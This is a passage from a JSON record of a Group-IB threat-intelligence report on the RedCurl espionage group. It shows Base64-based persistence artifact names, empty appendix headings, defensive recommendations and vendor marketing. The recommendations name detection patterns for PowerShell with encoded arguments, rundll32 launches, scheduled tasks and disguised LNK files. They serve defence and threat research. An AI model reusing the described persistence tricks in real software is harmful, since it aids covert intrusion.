Base64(%USERNAME%)\r\nLocation\\WindowsActionDialog_ + Base64(%USERNAME%)\r\nAppID\\VerifiedPublisherCertStoreCheck_ + Base64(%USERNAME%)\n\n52\r\nAppendix 2. Examples of FSA, C1, and C2\r\nRedCurl.FSA:\n\n53\r\nRedCurl.C1:\n\n54\r\nRedCurl.C2:\n\n55\r\nRecommendations\r\nEach analytical report issued by Group-IB’s Threat Intelligence\r\n\u0026 Attribution team contains recommendations on how to prevent attacks conducted by the group(s) analyzed. In this case,\r\nGroup-IB experts recommend taking the following steps:\r\n1. Analyze phishing emails detected by security tools and users.\r\n2. Monitor applications (including command line arguments) that\r\nare often used by cybercriminals during initial compromise\r\n(Microsoft Office, Acrobat Reader, archivers, etc.).\r\n3. Restrict PowerShell execution on systems where it is unnecessary. Monitor executable scripts and pay close attention\r\nto powershell.exe processes with long Base64-encoded strings\r\nin arguments.\r\n4. Monitor arguments with which rundll32.exe is launched.\r\n5. Monitor and verify tasks created in the scheduler.\r\n6. Block access to cloud storage devices that are unnecessary.\r\n7. 
Hunt for LNK files that point to documents or images but also\r\nhave rundll32.exe or powershell.exe in the file path.\n\nGroup-IB Threat\r\nIntelligence and\r\nResearch Centers\r\n• Europe\r\n• Russia\r\n• Middle East\r\n• Asia-Pacific\r\nGroup-IB is a global leader in high-fidelity\r\nThreat Hunting and Intelligence, best-in-class\r\nfraud prevention solutions, and high-profile\r\ncyber investigations.\r\n• Globally distributed cybercrime\r\nmonitoring infrastructure\r\n• Digital Forensics \u0026 Malware Analysis Laboratory\r\n• High-Tech Crime Investigations\r\n• CERT-GIB: 24/7 monitoring centers and\r\nComputer Emergency Response Team\r\nOSCE INTERPOL\r\nAND EUROPOL\r\nPartner and active collaborator\r\nin global investigations\r\nRecommended by the\r\nOSCE as a cybersecurity\r\nsolutions provider\r\nRanked among the Top 10 cybersecurity\r\ncompanies in the APAC region\r\naccording to APAC CIO Outlook\r\nAPAC\r\nTOP 10\r\nAMSTERDAM\r\nMOSCOW\r\nDUBAI\r\nSINGAPORE\n\nThreat Intelligence\r\n\u0026 Attribution\r\nSystem for analyzing and\r\nattributing cyberattacks, threat\r\nhunting, and protecting network\r\ninfrastructure based on data\r\nrelating to adversary tactics,\r\ntools, and activity\r\nFraud Hunting\r\nPlatform\r\nClient-side digital identity\r\nprotection and fraud prevention\r\nin real time\r\nThreat Hunting\r\nFramework\r\nAdversary-centric detection\r\nof targeted attacks and\r\nunknown threats for IT and\r\nOT environments\r\nAtmosphere: Cloud\r\nEmail Protection\r\nPatented email security\r\ntechnology that blocks,\r\ndetonates and hunts for the\r\nmost advanced email threats\r\nDigital Risk\r\nProtection\r\nAI-driven platform for digital risk\r\nidentification and mitigation\r\n©GROUP−IB\r\nGroup-IB’s\r\ntechnologies\r\nand innovations\r\nGroup-IB’s experience in performing successful global\r\ninvestigations with state-of-the-art threat intelligence\r\nand detecting cybercriminals at every stage of attack\r\npreparation has been fused into an 
ecosystem of highly\r\nsophisticated software and hardware solutions\r\ndesigned to monitor, identify, and prevent cyber threats.\r\nOur mission is to protect our clients in cyberspace at all\r\ncosts using innovative technologies and services.\r\nFORRESTER\r\nFROST \u0026 SULLIVAN\r\nGARTNER IDC\r\nFORRESTER\r\nFROST \u0026 SULLIVAN\r\nKUPPINGERCOLE\r\nANALYSTS AG\r\nKUPPINGERCOLE\r\nANALYSTS AG\r\nGroup-IB’s technologies\r\nare recognized by the\r\nworld’s leading research\r\ncompanies:\r\n— Innovation Excellence\r\n— Product Leader\r\n— Innovation Leader\r\nGARTNER\r\nNEW\n\n©\r\nGROUP−IB\r\nIntelligence-driven services\r\nGroup-IB’s technological leadership and\r\nR\u0026D capabilities are built on the company’s 18 years\r\nof hands-on experience in performing successful\r\ncybercrime investigations worldwide and the 70,000\r\nhours of cybersecurity incident response accumulated\r\nin our leading forensic laboratory and CERT-GIB.\r\nHI-TECH CRIME\r\nINVESTIGATIONS\r\nDigital Forensics\r\nMalware Analysis\r\nGroup-IB investigates\r\n• High-tech crimes\r\n• Data leaks\r\n• Corporate and financial crimes\r\n• Sophisticated attacks against\r\ncritical infrastructure\r\nSECURITY AND COMPLIANCE\r\nASSESSMENTS\r\n• Penetration Testing\r\n• Source code analysis\r\n• Compromise Assessment\r\n• Red Teaming engagements\r\n• Incident Response Readiness\r\nAssessment\r\n• Compliance Auditing\r\nCYBER EDUCATION CENTER\r\nTechnical courses\r\n• Incident Response\r\n• Malware analysis\r\n• Threat Hunting and more\r\nNon-technical workshops\r\n• Digital hygiene\r\n• Personal cybersecurity\r\n• Reputation management and more\r\nWorkshops and masterclasses for\r\nuniversity and high school students\r\nTHREAT HUNTING\r\nAND INCIDENT RESPONSE\r\n• CERT-GIB: 24/7 incident\r\nresponse center\r\n• Proactive threat hunting\r\n• On-prem incident response\r\nfor complex attacks\r\n• Investigation subscription\r\nworld-class\r\nexperts\r\nhours of incident\r\nresponse\r\nsuccessful 
investigations\r\nworldwide\r\npractical\r\nexperience\r\n550+ 70,000+ 1,300+ 18 years\r\nFORRESTER\r\nGARTNER\n\nwww.group-ib.com\r\ngroup-ib.com/blog/\r\ninfo@group-ib.com\r\n+65 31 59 37 98\r\ntwitter.com/groupib_gib\r\nhttps://www.facebook.com/groupibHQ\r\nPREVENTING\r\nAND INVESTIGATING\r\nCYBERCRIME\r\nSINCE 2003",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://go.group-ib.com/report-redcurl-en?_gl=1*t8hou9*_ga*MTY4NTg1NzA4Ny4xNzA4MDk1MjMx*_ga_QMES53K3Y2*MTcwODA5NTIzMC4xLjEuMTcwODA5NjAyNy45LjAuMA.."
	],
	"report_names": [
		"report-redcurl-en?_gl=1*t8hou9*_ga*MTY4NTg1NzA4Ny4xNzA4MDk1MjMx*_ga_QMES53K3Y2*MTcwODA5NTIzMC4xLjEuMTcwODA5NjAyNy45LjAuMA.."
	],
	"threat_actors": [],
	"ts_created_at": 1777949136,
	"ts_updated_at": 1777949196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bbc72124ae50a0e2bdcac05d845716b8f11699af.pdf",
		"text": "https://archive.orkl.eu/bbc72124ae50a0e2bdcac05d845716b8f11699af.txt",
		"img": "https://archive.orkl.eu/bbc72124ae50a0e2bdcac05d845716b8f11699af.jpg"
	}
}